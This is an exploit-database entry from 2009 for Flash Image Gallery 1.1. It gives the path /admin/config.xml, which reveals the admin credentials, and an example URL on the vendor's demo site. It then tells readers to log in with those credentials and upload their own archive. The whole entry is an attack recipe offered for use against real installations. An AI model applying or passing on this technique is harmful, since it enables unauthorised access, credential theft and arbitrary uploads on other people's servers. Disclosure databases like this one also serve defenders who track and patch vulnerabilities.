Flash Image Gallery 1.1 Arbitrary Config File Disclosure Vulnerability

2009-05-26T00:00:00
ID 1337DAY-ID-5255
Type zdt
Reporter DarkbiteX
Modified 2009-05-26T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ======================================================================
Flash Image Gallery 1.1 Arbitrary Config File Disclosure Vulnerability
======================================================================


#########################################################################################
[0x01] Informations:

Script         : Flash Image Gallery 1.1 and maybe last version
Download       : http://www.flashimagegallery.com/download/fig_116_admin_110.zip
Vulnerability  : Sensitive Data Disclosure
Author         : DarkbiteX

########################################################################################
Bug:[Sensitive Data Disclosure]
########################################################################################

[!] EXPLOIT: /[path]/admin/config.xml
EXAMPLE: http://www.flashimagegallery.com/demo/gallery/admin/config.xml
                 and paste de user and pass http://www.flashimagegallery.com/demo/gallery/admin/
                
                 Use Of The Imagination and UPLOAD your archive ;) 
#########################################################################################



#  0day.today [2018-04-12]  #